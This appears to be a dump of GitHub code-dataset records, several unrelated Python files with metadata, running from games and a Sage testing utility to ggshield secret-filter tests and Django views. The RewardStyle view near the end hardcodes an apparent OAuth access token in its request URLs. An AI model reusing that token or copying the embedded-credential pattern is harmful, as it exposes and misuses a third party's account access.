train_time))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"jasonding111/Multi-level-feature-extraction-network-for-person-re-identification","sub_path":"train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":3563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70151369400","text":"r\"\"\"\nRandom testing\n\nSome Sage modules do random testing in their doctests; that is, they\nconstruct test cases using a random number generator. To get the\nbroadest possible test coverage, we want everybody who runs the\ndoctests to use a different random seed; but we also want to be able\nto reproduce the problems when debugging. This module provides a\ndecorator to help write random testers that meet these goals.\n\"\"\"\n\nfrom functools import wraps\n\n\ndef random_testing(fn):\n r\"\"\"\n This decorator helps create random testers. These can be run as\n part of the standard Sage test suite; everybody who runs the test\n will use a different random number seed, so many different random\n tests will eventually be run.\n\n INPUT:\n\n - ``fn`` - The function that we are wrapping for random testing.\n\n The resulting function will take two additional arguments, *seed*\n (default ``None``) and *print_seed* (default ``False``). The\n result will set the random number seed to the given seed value (or\n to a truly random value, if *seed* is not specified), then call\n the original function. If *print_seed* is true, then the seed will\n be printed before calling the original function. If the original\n function raises an exception, then the random seed that was used\n will be displayed, along with a message entreating the user to\n submit a bug report. All other arguments will be passed through\n to the original function.\n\n Here is a set of recommendations for using this wrapper.\n\n The function to be tested should take arguments specifying the\n difficulty of the test (size of the test cases, number of\n iterations, etc.), as well as an argument *verbose* (defaulting to\n false). With *verbose* true, it should print the values being\n tested. Suppose ``test_foo()`` takes an argument for number of\n iterations. Then the doctests could be::\n\n test_foo(2, verbose=True, seed=0)\n test_foo(10)\n test_foo(100) # long time\n\n The first doctest, with the specified seed and ``verbose=True``, simply\n verifies that the tests really are reproducible (that ``test_foo``\n is correctly using the :mod:`randstate` framework). The next two tests\n use truly random seeds, and will print out the seed used if the test\n fails (raises an exception).\n\n If you want a very long-running test using this setup, you should do\n something like (in Python 2)::\n\n for _ in xrange(10^10): test_foo(100)\n\n instead of::\n\n test_foo(10^12)\n\n If the test fails after several hours, the latter snippet would\n make you rerun the test for several hours while reproducing and\n debugging the problem. With the former snippet, you only need to\n rerun ``test_foo(100)`` with a known-failing random seed.\n\n See :func:`sage.misc.random_testing.test_add_commutes` for a\n simple example using this decorator, and :mod:`sage.rings.tests`\n for realistic uses.\n\n Setting *print_seed* to true is useless in doctests, because the\n random seed printed will never match the expected doctest result\n (and using ``# random`` means the doctest framework will never\n report an error even if one happens). However, it is useful if\n you have a random test that sometimes segfaults. The normal\n print-the-random-seed-on-exceptions won't work then, so you can\n run::\n\n while True: test_foo(print_seed=True)\n\n and look at the last seed that was printed before it crashed.\n\n\n TESTS::\n\n sage: from sage.misc.random_testing import random_testing\n sage: def foo(verbose=False):\n ....: 'oh look, a docstring'\n ....: n = ZZ.random_element(2^50)\n ....: if verbose:\n ....: print(\"Random value: %s\" % n)\n ....: assert(n == 49681376900427)\n sage: foo = random_testing(foo)\n sage: foo(seed=0, verbose=True)\n Random value: 49681376900427\n sage: foo(seed=15, verbose=True)\n Random value: 1049538412064764\n Random testing has revealed a problem in foo\n Please report this bug! You may be the first\n person in the world to have seen this problem.\n Please include this random seed in your bug report:\n Random seed: 15\n AssertionError()\n sage: foo() # random\n Random testing has revealed a problem in foo\n Please report this bug! You may be the first\n person in the world to have seen this problem.\n Please include this random seed in your bug report:\n Random seed: 272500700755151445506092479579811710040\n AssertionError()\n sage: foo.__doc__\n 'oh look, a docstring'\n sage: foo.__name__\n 'foo'\n sage: def bar(): pass\n sage: bar = random_testing(bar)\n sage: bar(print_seed=True) # random\n Random seed: 262841091890156346923539765543814146051\n \"\"\"\n from sage.misc.randstate import seed, initial_seed\n from sys import stdout\n\n @wraps(fn)\n def wrapped_fun(*args, **kwargs):\n arg_seed = None\n if 'seed' in kwargs:\n arg_seed = kwargs['seed']\n del kwargs['seed']\n with seed(arg_seed):\n used_seed = initial_seed()\n if 'print_seed' in kwargs:\n if kwargs['print_seed']:\n print(\"Random seed: {}\".format(used_seed))\n del kwargs['print_seed']\n # I don't know if this line is necessary, but it can't\n # hurt; and it would be a real pity to lose the\n # information you need to reproduce a segfault because\n # it was missing...\n stdout.flush()\n try:\n fn(*args, **kwargs)\n except Exception as e:\n # We treat any sort of Exception as a doctest\n # failure. (We have to eat the exception, because if\n # doctesting sees an exception, it doesn't display\n # whatever was printed before the exception happened\n # -- so the text we print here would be lost.) Note\n # that KeyboardInterrupt is not an Exception, so\n # pressing Control-C doesn't print this message.\n print(\"Random testing has revealed a problem in \" + fn.__name__)\n print(\"Please report this bug! You may be the first\")\n print(\"person in the world to have seen this problem.\")\n print(\"Please include this random seed in your bug report:\")\n print(\"Random seed: {}\".format(used_seed))\n print(repr(e))\n return wrapped_fun\n\n\n@random_testing\ndef test_add_commutes(trials, verbose=False):\n r\"\"\"\n This is a simple demonstration of the :func:`random_testing` decorator and\n its recommended usage.\n\n We test that addition is commutative over rationals.\n\n EXAMPLES::\n\n sage: from sage.misc.random_testing import test_add_commutes\n sage: test_add_commutes(2, verbose=True, seed=0)\n a == -4, b == 0 ...\n Passes!\n a == -1/2, b == -1/95 ...\n Passes!\n sage: test_add_commutes(10)\n sage: test_add_commutes(1000) # long time\n \"\"\"\n from sage.rings.rational_field import QQ\n for _ in range(trials):\n a = QQ.random_element()\n b = QQ.random_element()\n if verbose:\n print(\"a == {}, b == {} ...\".format(a, b))\n assert(a + b == b + a)\n if verbose:\n print(\"Passes!\")\n\n\n@random_testing\ndef test_add_is_mul(trials, verbose=False):\n r\"\"\"\n This example demonstrates a failing :func:`random_testing` test,\n and shows how to reproduce the error.\n\n DO NOT USE THIS AS AN EXAMPLE OF HOW TO USE\n :func:`random_testing`! Instead, look at\n :func:`sage.misc.random_testing.test_add_commutes`.\n\n We test that ``a+b == a*b``, for *a*, *b* rational. This is of\n course false, so the test will almost always fail.\n\n EXAMPLES::\n\n sage: from sage.misc.random_testing import test_add_is_mul\n\n We start by testing that we get reproducible results when setting\n *seed* to 0.\n\n ::\n\n sage: test_add_is_mul(2, verbose=True, seed=0)\n a == -4, b == 0 ...\n Random testing has revealed a problem in test_add_is_mul\n Please report this bug! You may be the first\n person in the world to have seen this problem.\n Please include this random seed in your bug report:\n Random seed: 0\n AssertionError()\n\n Normally in a ``@random_testing`` doctest, we would leave off the\n ``verbose=True`` and the ``# random``. We put it in here so that we can\n verify that we are seeing the exact same error when we reproduce\n the error below.\n\n ::\n\n sage: test_add_is_mul(10, verbose=True) # random\n a == -2/7, b == 1 ...\n Random testing has revealed a problem in test_add_is_mul\n Please report this bug! You may be the first\n person in the world to have seen this problem.\n Please include this random seed in your bug report:\n Random seed: 216390410596009428782506007128692114173\n AssertionError()\n\n OK, now assume that some user has reported a\n :func:`test_add_is_mul` failure. We can specify the same\n *random_seed* that was found in the bug report, and we will get the\n exact same failure so that we can debug the \"problem\".\n\n ::\n\n sage: test_add_is_mul(10, verbose=True, seed=216390410596009428782506007128692114173)\n a == -2/7, b == 1 ...\n Random testing has revealed a problem in test_add_is_mul\n Please report this bug! You may be the first\n person in the world to have seen this problem.\n Please include this random seed in your bug report:\n Random seed: 216390410596009428782506007128692114173\n AssertionError()\n \"\"\"\n from sage.rings.rational_field import QQ\n for _ in range(trials):\n a = QQ.random_element()\n b = QQ.random_element()\n if verbose:\n print(\"a == {}, b == {} ...\".format(a, b))\n assert(a + b == a * b)\n if verbose:\n print(\"Passes!\")\n","repo_name":"sagemath/sage-archive-2023-02-01","sub_path":"src/sage/misc/random_testing.py","file_name":"random_testing.py","file_ext":"py","file_size_in_byte":10186,"program_lang":"python","lang":"en","doc_type":"code","stars":2037,"dataset":"github-code","pt":"40"} +{"seq_id":"29688089019","text":"MAX_GRID = 3\n\n\ndef create_grid(user_input: str) -> list[list[str]]:\n \"\"\"\n Create 3x3 Game Grid\n @param user_input: string containing X's / O's and/or empty lines\n @return: 3X3 Game Grid\n \"\"\"\n grid = []\n\n for i in range(0, len(user_input), MAX_GRID):\n row = [user_input[j] for j in range(i, MAX_GRID + i)]\n grid.append(row)\n\n return grid\n\n\ndef is_row_winner(grid: list[list[str]], player: str) -> bool:\n \"\"\"\n Check if X or O has won in any of the rows\n @param grid: 2d 3x3 list\n @param player: X or O\n @return: true if player has won else false\n \"\"\"\n for row in grid:\n if row.count(player) == MAX_GRID:\n return True\n\n return False\n\n\ndef is_col_winner(grid: list[list[str]], player: str) -> bool:\n \"\"\"\n Check if X or O has won in any of the columns\n @param grid: 2d 3x3 list\n @param player: X or O\n @return: true if player has won else false\n \"\"\"\n for i in range(len(grid)):\n count = 0\n for j in range(len(grid[i])):\n if grid[j][i] == player:\n count += 1\n if count == MAX_GRID:\n return True\n\n return False\n\n\ndef is_diag_winner(grid: list[list[str]], player: str) -> bool:\n \"\"\"\n Check if X or O has won in any of the diagonals\n @param grid: 2d 3x3 list\n @param player: X or O\n @return: true if player won diag else false\n \"\"\"\n count = 0\n # check diag\n for i in range(MAX_GRID):\n if grid[i][i] == player:\n count += 1\n\n if count == 3:\n return True\n\n # check reverse diag\n count = 0\n for i in range(MAX_GRID):\n if grid[i][MAX_GRID - 1 - i] == player:\n count += 1\n\n return count == 3\n\n\ndef is_cell_empty(grid: list[list[str]]) -> bool:\n \"\"\"\n Check if cell is empty\n @param grid: 2d 3x3 list\n @return: true if cell is empty else false\n \"\"\"\n for row in grid:\n for col in row:\n if col == \"_\":\n return True\n\n return False\n\n\ndef get_player_diff(grid: list[list[str]]) -> int:\n \"\"\"\n Get difference between X or O / O or X\n @param grid: 2d 3x3 list\n @return: difference\n \"\"\"\n player_x = 0\n player_o = 0\n\n for row in grid:\n for col in row:\n if col == \"X\":\n player_x += 1\n elif col == \"O\":\n player_o += 1\n\n return player_x - player_o if player_x > player_o else player_o - player_x\n\n\ndef is_game_finished(grid: list[list[str]]) -> bool:\n \"\"\"\n Check if game has finished\n @param grid: 2d 3x3 list\n @return: true if any of the players has won or it's a draw else false\n \"\"\"\n has_ended = True\n if (\n is_row_winner(grid, \"X\")\n or is_col_winner(grid, \"X\")\n or is_diag_winner(grid, \"X\")\n ):\n print(\"X wins\")\n return has_ended\n elif (\n is_row_winner(grid, \"O\")\n or is_col_winner(grid, \"O\")\n or is_diag_winner(grid, \"O\")\n ):\n print(\"O wins\")\n return has_ended\n # if no winner and cell is not empty it's a draw\n elif not is_cell_empty(grid):\n print(\"Draw\")\n return has_ended\n\n return False\n\n\ndef print_grid(grid: list[list[str]]) -> None:\n \"\"\"\n Print Game state / grid\n @param grid: 3x3 grid\n \"\"\"\n print(\"-\" * len(grid) * MAX_GRID)\n for row in grid:\n print(\"|\", end=\" \")\n for col in row:\n print(f\"{col}\", end=\" \")\n print(\"|\", end=\" \")\n print()\n print(\"-\" * len(grid) * MAX_GRID)\n","repo_name":"ovisb/python-simple-tic-tac-toe","sub_path":"simple_tic_tac_toe/simple_tic_tac_toe.py","file_name":"simple_tic_tac_toe.py","file_ext":"py","file_size_in_byte":3524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20995913605","text":"# Import the random, string and natural language toolkit modules.\nimport random\nimport string\nfrom nltk.corpus import words\n\n\n# Create a function to play hangman\ndef play_hangman():\n\n # Randomly pick a secret word that has 4 or more letters.\n word_list = words.words()\n secret_word = \"\"\n while len(secret_word) < 4:\n secret_word = random.choice(word_list)\n # Put a '_' in the display word for every letter that needs to be guessed.\n display_word = [\"_\"] * len(secret_word)\n guessed_letters = []\n tries_left = 8\n\n while tries_left > 0 and \"_\" in display_word:\n # Show the player which letters have (and haven't) been guessed, and the number of tries that are left.\n print(\"\\n\" + \"\".join(display_word))\n if tries_left == 1:\n print(\"\\nYou have 1 try left\")\n else:\n print(\"\\nYou have\", tries_left, \"tries left\")\n letter_guess = input(\"Guess a letter: \")\n # If the guess is invalid, restart the loop.\n if len(letter_guess) != 1:\n print(\"Please guess a single letter.\")\n continue\n if letter_guess not in string.ascii_letters:\n print(\"That is not a letter.\")\n continue\n if letter_guess in guessed_letters:\n print(\"You already guessed that letter.\")\n continue\n # Add all valid guesses to a list of letters guessed.\n else:\n guessed_letters.append(letter_guess)\n # Update the display word if the player guesses a letter correctly.\n if letter_guess in secret_word:\n for x, letter in enumerate(secret_word):\n if letter_guess == letter:\n display_word[x] = letter_guess.upper()\n # If the letter isn't in the secret word, tell the player and subtract 1 from their remaining guesses.\n else:\n print(\"That letter is not in the word.\")\n tries_left -= 1\n\n # If the player guesses all the letters in the secret word before running out of guesses, they win!\n if \"_\" not in display_word:\n print(\"\\nYou guessed the word \\\"\" + secret_word.upper() + \"\\\"!\\nYou win!\")\n else:\n print(\"\\nYou didn't guess the word \\\"\" + secret_word.upper() + \"\\\"!\\nYou lose!\")\n\n\n# Display a welcome menu.\nwhile True:\n print('''\n H A N G M A N\n\n \"play\" : Play a game\n \"exit\" : Quit the program\n ''')\n choice = input(\"\\nWhat would you like to do? \")\n if choice == \"play\":\n print(\"\\nGood luck!\")\n play_hangman()\n continue\n elif choice == \"exit\":\n quit()\n else:\n print(\"Please choose from the options above.\")\n continue\n","repo_name":"valenciarichards/hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43752509378","text":"from PySide6.QtWidgets import (QApplication, QCheckBox, QLabel, QLineEdit, QMainWindow)\nfrom PySide6 import QtCore, QtGui, QtWidgets\n\nfrom app.resource.windows.MyLogin import MyLogin\nfrom app.tools.CourseKiller import Coursekiller\nfrom app.resource.windows.MyMainUi import MyMainUi\n\n\n\nclass MainWindow(QMainWindow):\n def __init__(self, parent=None):\n self.course_killer = Coursekiller(\"app/config/config.yaml\")\n super().__init__(parent)\n self.init_login_ui()\n self.windowflags = self.windowFlags()\n self.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n self.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n # self.main_ui = MyMainUi(self)\n # self.setCentralWidget(self.main_ui)\n self.setWindowTitle(\"Hdu Course Killer\")\n self.setWindowIcon(QtGui.QIcon(\":/icons/icons/app/logo.ico\"))\n self.show()\n\n\n\n \n def init_login_ui(self):\n self.login = MyLogin(self)\n self.login.set_forget_link(self.course_killer.config.config[\"session\"][\"url\"][\"login\"])\n self.login.connect_login_btn(self.course_killer.login)\n self.login.set_user_info(self.course_killer.config.config[\"userinfo\"][\"username\"],\\\n self.course_killer.config.config[\"userinfo\"][\"password\"], self.course_killer.config.config[\"userinfo\"][\"remember\"])\n self.login.login_success.connect(self.login_success)\n\n def init_main_ui(self):\n self.main_ui = MyMainUi(self)\n self.setCentralWidget(self.main_ui)\n self.setWindowFlags(self.windowflags)\n self.main_ui.data_changed.emit(self.course_killer.courses[\"show_info\"])\n self.main_ui.set_delete_func(self.delete_item)\n self.main_ui.set_search_func(self.course_killer.search)\n self.main_ui.set_add_func(self.course_killer.add_course)\n self.main_ui.set_run_func(self.course_killer.run)\n self.main_ui.set_get_course_info_func(self.course_killer.get_course_info)\n self.main_ui.set_user_info(self.course_killer.config.config[\"userinfo\"][\"username\"])\n self.show()\n \n def delete_item(self, index):\n self.course_killer.delete_item(index)\n self.main_ui.data_changed.emit(self.course_killer.courses[\"show_info\"]) # 删除之后要立即更新显示的表格(发射data已改变的信号)\n\n @QtCore.Slot()\n def login_success(self):\n self.login.close()\n self.init_main_ui()\n \n\n\n\nif __name__ == '__main__':\n app = QApplication()\n mainwindow = MainWindow()\n app.exec()\n\n\n\n","repo_name":"LittleHeroZZZX/HduCourseKiller","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"23232140279","text":"from anagram_check import AnagramChecker\n\n\ndef main():\n print(\"\\nWelcome to Anagram Checker!\")\n while True:\n inp_str = input(\"\\nPlease enter a word in lowercase (just hit <Enter> to exit) : \")\n if len(inp_str) == 0:\n print(\"\\nThanks for playing. Goodbye.\\n\")\n break\n inp_str = inp_str.strip()\n if not(inp_str.isalpha() and inp_str.islower() and len(inp_str.split()) == 1):\n print(\"Sorry, unexpected entry. Try again.\")\n continue\n \n run = AnagramChecker()\n anagrams = run.get_anagrams(inp_str)\n print(f\"\\nYOUR WORD : '{inp_str}'\")\n print(\"A valid word indeed.\")\n if anagrams == []:\n nice_str = 'none'\n else:\n nice_str = ', '.join(anagrams)\n print(f\"Anagrams for this word : {nice_str}.\")\n\nmain()\n ","repo_name":"Prodevking1/odc","sub_path":"WEEK 5/Day_5/mini_proj2/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34516873045","text":"import time\n\nfrom plugincore.database.config.database_info import DataBaseInfo\nfrom plugincore.database.config.db_driver import DBDriver\nfrom plugincore.database.support.database_api.db_thread import DBThread\nfrom plugincore.unit_tests.plugin_database.test_commit_data import commit_sqls\nfrom plugincore.unit_tests.plugin_database.test_select_data import database_info_dict, select_sqls\n\n\ndef db_thread_select():\n start = time.perf_counter()\n tdb = DBThread(db_driver=DBDriver(database_info_dict))\n print(time.perf_counter() - start)\n start = time.perf_counter()\n for r in tdb.fetchmany(sql_statements=select_sqls):\n print(r)\n print(time.perf_counter() - start)\n\ndef db_thread_commit():\n start = time.perf_counter()\n tdb = DBThread(db_driver=DBDriver(DataBaseInfo(database_info_dict)))\n tdb.commit(commit_sqls)\n print(time.perf_counter() - start)\n\n\nif __name__ == '__main__':\n db_thread_select()\n # db_thread_commit()\n","repo_name":"thcpc/warden","sub_path":"plugincore/src/plugincore/unit_tests/plugin_database/db_thread_test.py","file_name":"db_thread_test.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71069861561","text":"import copy\nimport random\nfrom typing import Iterable, List, Set\n\nimport pytest\nfrom pygitguardian.models import Match, PolicyBreak, ScanResult\nfrom snapshottest import Snapshot\n\nfrom ggshield.core.filter import (\n censor_content,\n censor_match,\n get_ignore_sha,\n remove_ignored_from_result,\n)\nfrom ggshield.core.types import IgnoredMatch\nfrom tests.unit.conftest import (\n _MULTI_SECRET_ONE_LINE_PATCH,\n _MULTI_SECRET_ONE_LINE_PATCH_OVERLAY,\n _MULTI_SECRET_ONE_LINE_PATCH_OVERLAY_SCAN_RESULT,\n _MULTI_SECRET_ONE_LINE_PATCH_SCAN_RESULT,\n _MULTI_SECRET_TWO_LINES_PATCH,\n _MULTI_SECRET_TWO_LINES_PATCH_SCAN_RESULT,\n _MULTILINE_SECRET,\n _MULTIPLE_SECRETS_PATCH_CONTENT,\n _MULTIPLE_SECRETS_SCAN_RESULT,\n _ONE_LINE_AND_MULTILINE_PATCH_CONTENT,\n _ONE_LINE_AND_MULTILINE_PATCH_SCAN_RESULT,\n _SIMPLE_SECRET_MULTILINE_PATCH,\n _SIMPLE_SECRET_MULTILINE_PATCH_SCAN_RESULT,\n _SIMPLE_SECRET_PATCH,\n _SIMPLE_SECRET_PATCH_SCAN_RESULT,\n _SIMPLE_SECRET_WITH_FILENAME_PATCH_SCAN_RESULT,\n)\n\n\n_FILTERED_MULTILINE_SECRET = \"\"\"-----BEGIN RSA PRIVATE KEY-----\n+MIIBOgIBAAJBAIIRkYjxjE3KIZi******************************+******\n+****************************************************************\n+****************************************************************\n+***********+****************************************************\n+****************+***********************************************\n+**********************+*****************************************\n+****+******Xme/ovcDeM1+3W/UmSHYUW4b3WYq4\n+-----END RSA PRIVATE KEY-----\"\"\" # noqa\n\n\n@pytest.mark.parametrize(\n \"policy_breaks, duplicates, expected_shas\",\n [\n pytest.param(\n _SIMPLE_SECRET_PATCH_SCAN_RESULT.policy_breaks,\n False,\n {\"2b5840babacb6f089ddcce1fe5a56b803f8b1f636c6f44cdbf14b0c77a194c93\"},\n id=\"_SIMPLE_SECRET_PATCH_SCAN_RESULT\",\n ),\n pytest.param(\n _SIMPLE_SECRET_PATCH_SCAN_RESULT.policy_breaks,\n True,\n {\"2b5840babacb6f089ddcce1fe5a56b803f8b1f636c6f44cdbf14b0c77a194c93\"},\n id=\"_SIMPLE_SECRET_PATCH_SCAN_RESULT-duplicated\",\n ),\n pytest.param(\n _MULTIPLE_SECRETS_SCAN_RESULT.policy_breaks,\n False,\n {\"41b8889e5e794b21cb1349d8eef1815960bf5257330fd40243a4895f26c2b5c8\"},\n id=\"_MULTIPLE_SECRETS_SCAN_RESULT\",\n ),\n pytest.param(\n _ONE_LINE_AND_MULTILINE_PATCH_SCAN_RESULT.policy_breaks,\n False,\n {\n \"530e5a4a7ea00814db8845dd0cae5efaa4b974a3ce1c76d0384ba715248a5dc1\",\n \"1945f4a0c42abb19c1a420ddd09b4b4681249a3057c427b95f794b18595e7ffa\",\n \"060bf63de122848f5efa122fe6cea504aae3b24cea393d887fdefa1529c6a02e\",\n },\n id=\"_MULTIPLE_SECRETS_SCAN_RESULT\",\n ),\n ],\n)\ndef test_get_ignore_sha(\n policy_breaks: List[PolicyBreak],\n duplicates: bool,\n expected_shas: Set[str],\n snapshot: Snapshot,\n) -> None:\n copy_policy_breaks = copy.deepcopy(policy_breaks)\n if duplicates:\n for policy_break in policy_breaks:\n random.shuffle(policy_break.matches)\n copy_policy_breaks.extend(policy_breaks)\n\n ignore_shas = {get_ignore_sha(policy_break) for policy_break in copy_policy_breaks}\n if duplicates:\n assert len(ignore_shas) == len(copy_policy_breaks) / 2\n assert ignore_shas == expected_shas\n\n\n@pytest.mark.parametrize(\n \"scan_result, ignores, final_len\",\n [\n pytest.param(\n _SIMPLE_SECRET_PATCH_SCAN_RESULT,\n [],\n _SIMPLE_SECRET_PATCH_SCAN_RESULT.policy_break_count,\n id=\"_SIMPLE_SECRET_PATCH_SCAN_RESULT-no remove, not all policies\",\n ),\n pytest.param(\n _SIMPLE_SECRET_WITH_FILENAME_PATCH_SCAN_RESULT,\n [],\n _SIMPLE_SECRET_WITH_FILENAME_PATCH_SCAN_RESULT.policy_break_count - 1,\n id=\"_SIMPLE_SECRET_PATCH_WITH_FILENAME_SCAN_RESULT-not all policies\",\n ),\n pytest.param(\n _SIMPLE_SECRET_PATCH_SCAN_RESULT,\n [\"2b5840babacb6f089ddcce1fe5a56b803f8b1f636c6f44cdbf14b0c77a194c93\"],\n 0,\n id=\"_SIMPLE_SECRET_PATCH_SCAN_RESULT-remove by sha\",\n ),\n pytest.param(\n _SIMPLE_SECRET_PATCH_SCAN_RESULT,\n [\"368ac3edf9e850d1c0ff9d6c526496f8237ddf91\"],\n 0,\n id=\"_SIMPLE_SECRET_PATCH_SCAN_RESULT-remove by plaintext\",\n ),\n pytest.param(\n _ONE_LINE_AND_MULTILINE_PATCH_SCAN_RESULT,\n [\"1945f4a0c42abb19c1a420ddd09b4b4681249a3057c427b95f794b18595e7ffa\"],\n 2,\n id=\"_MULTI_SECRET_ONE_LINE_PATCH_SCAN_RESULT-remove one by sha\",\n ),\n pytest.param(\n _ONE_LINE_AND_MULTILINE_PATCH_SCAN_RESULT,\n [\n \"060bf63de122848f5efa122fe6cea504aae3b24cea393d887fdefa1529c6a02e\",\n \"ce3f9f0362bbe5ab01dfc8ee565e4371\",\n ],\n 1,\n id=\"_MULTI_SECRET_ONE_LINE_PATCH_SCAN_RESULT-remove two by mix\",\n ),\n ],\n)\ndef test_remove_ignores(\n scan_result: ScanResult, ignores: Iterable, final_len: int\n) -> None:\n copy_result = copy.deepcopy(scan_result)\n ignored_matches = [IgnoredMatch(name=\"\", match=x) for x in ignores]\n remove_ignored_from_result(copy_result, ignored_matches)\n\n assert len(copy_result.policy_breaks) == final_len\n assert copy_result.policy_break_count == final_len\n\n\n@pytest.mark.parametrize(\n \"input_match, expected_value\",\n [\n pytest.param(\n Match.SCHEMA.load(\n {\n \"match\": \"294790898041575\",\n \"index_start\": 31,\n \"index_end\": 46,\n \"type\": \"client_id\",\n }\n ),\n \"294*********575\",\n id=\"SIMPLE\",\n ),\n pytest.param(\n Match.SCHEMA.load(\n {\n \"match\": _MULTILINE_SECRET,\n \"index_start\": 31,\n \"index_end\": 46,\n \"type\": \"client_id\",\n }\n ),\n _FILTERED_MULTILINE_SECRET,\n id=\"_MULTILINE_SECRET\",\n ),\n ],\n)\ndef test_censor_match(input_match: Match, expected_value: str) -> None:\n value = censor_match(input_match)\n assert len(value) == len(input_match.match)\n assert value == expected_value\n\n\n@pytest.mark.parametrize(\n \"content, policy_breaks\",\n [\n pytest.param(\n _MULTIPLE_SECRETS_PATCH_CONTENT,\n _MULTIPLE_SECRETS_SCAN_RESULT.policy_breaks,\n id=\"_MULTIPLE_SECRETS\",\n ),\n pytest.param(\n _ONE_LINE_AND_MULTILINE_PATCH_CONTENT,\n _ONE_LINE_AND_MULTILINE_PATCH_SCAN_RESULT.policy_breaks,\n id=\"_ONE_LINE_AND_MULTILINE_PATCH_SCAN_CONTENT\",\n ),\n pytest.param(\n _MULTI_SECRET_ONE_LINE_PATCH,\n _MULTI_SECRET_ONE_LINE_PATCH_SCAN_RESULT.policy_breaks,\n id=\"_MULTI_SECRET_ONE_LINE_PATCH\",\n ),\n pytest.param(\n _SIMPLE_SECRET_PATCH,\n _SIMPLE_SECRET_PATCH_SCAN_RESULT.policy_breaks,\n id=\"_SIMPLE_SECRET_PATCH\",\n ),\n pytest.param(\n _SIMPLE_SECRET_MULTILINE_PATCH,\n _SIMPLE_SECRET_MULTILINE_PATCH_SCAN_RESULT.policy_breaks,\n id=\"_SIMPLE_SECRET_MULTILINE_PATCH\",\n ),\n pytest.param(\n _SIMPLE_SECRET_PATCH,\n _SIMPLE_SECRET_WITH_FILENAME_PATCH_SCAN_RESULT.policy_breaks,\n id=\"_SIMPLE_SECRET_WITH_FILENAME_PATCH\",\n ),\n pytest.param(\n _MULTI_SECRET_ONE_LINE_PATCH_OVERLAY,\n _MULTI_SECRET_ONE_LINE_PATCH_OVERLAY_SCAN_RESULT.policy_breaks,\n id=\"_MULTI_SECRET_ONE_LINE_PATCH_OVERLAY\",\n ),\n pytest.param(\n _MULTI_SECRET_TWO_LINES_PATCH,\n _MULTI_SECRET_TWO_LINES_PATCH_SCAN_RESULT.policy_breaks,\n id=\"_MULTI_SECRET_TWO_LINES_PATCH\",\n ),\n ],\n)\ndef test_censor_content(content: str, policy_breaks: List[PolicyBreak]) -> None:\n copy_policy_breaks = copy.deepcopy(policy_breaks)\n new_content = censor_content(content, copy_policy_breaks)\n assert len(new_content) == len(content)\n for policy_break in policy_breaks:\n for match in policy_break.matches:\n assert match.match not in new_content\n","repo_name":"GitGuardian/ggshield","sub_path":"tests/unit/core/test_filter.py","file_name":"test_filter.py","file_ext":"py","file_size_in_byte":8431,"program_lang":"python","lang":"en","doc_type":"code","stars":1431,"dataset":"github-code","pt":"40"} +{"seq_id":"38797973080","text":"from .views import FruitsView, ImagesView, IndexView\nfrom django.urls import path\n\nfrom rest_framework.routers import SimpleRouter\n\nrouter = SimpleRouter()\nrouter.register(\"fruits\", FruitsView)\nrouter.register(\"images\", ImagesView, base_name=\"ImagesView\")\n\nurlpatterns = [\n path('', IndexView.as_view(), name='indexview'),\n]\n\nurlpatterns += router.urls\n","repo_name":"BoazKG93/superprice","sub_path":"superprice_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36641271107","text":"import aspose.slides as slides\n\n#ExStart:InterlopShapeID\n# The path to the documents directory.\ndataDir = \"./examples/data/\"\noutDir = \"./examples/out/\"\n\n# Instantiate a Presentation class that represents the presentation file\nwith slides.Presentation(dataDir + \"welcome-to-powerpoint.pptx\") as presentation:\n # Getting unique shape identifier in slide scope\n print(str(presentation.slides[0].shapes[0].office_interop_shape_id))\n\n#ExEnd:InterlopShapeID\n","repo_name":"aspose-slides/Aspose.Slides-for-Python-via-.NET","sub_path":"examples/src/Shapes/InterlopShapeID.py","file_name":"InterlopShapeID.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43203391525","text":"from django.shortcuts import render, HttpResponse\nimport requests, json, hashlib\nfrom six.moves.urllib.parse import urlparse, urlunparse, parse_qs\nimport urllib\nfrom xml.etree import ElementTree\nfrom .models import Product\n\ndef index(request):\n return render(request, 'base.html')\n\ndef encryptMd5Hash(string):\n m= hashlib.md5()\n m.update(string.encode('utf-8'))\n return m.hexdigest()\n\ndef rewardstyle(request):\n if request.method == 'POST':\n advertiserName = request.POST.get('advertiserName')\n getProdcuts(advertiserName)\n parsedData = []\n req = requests.get('https://api.rewardstyle.com/v1/advertisers?oauth_token=b0971cc14df1152194c7c9a4e72cf297')\n jsonList = []\n jsonList.append(json.loads(req.content.decode()))\n advertiserData = {}\n for data in jsonList:\n advertiserData['advertiser'] = data['advertisers']\n parsedData.append(advertiserData)\n return render(request, 'serviceapp/rewardstyle.html', {'data': parsedData}) \n \n\ndef getProdcuts(advertiserName):\n token = 'b0971cc14df1152194c7c9a4e72cf297'\n tokenHashed = encryptMd5Hash(token)\n url = 'https://api.rewardstyle.com/v1/product_feed?advertiser='+advertiserName+'&oauth_token='+token\n xml = requests.get(url, stream=True)\n tree = ElementTree.parse(xml.raw)\n for item in tree.iter('item'):\n product_id = item.find('product_id').text\n product_name = item.find('product_name').text\n product_url = item.find('product_url').text\n parsed = urlparse(product_url)\n qs = parse_qs(parsed.query)\n qs['t'] = [tokenHashed]\n newqs = 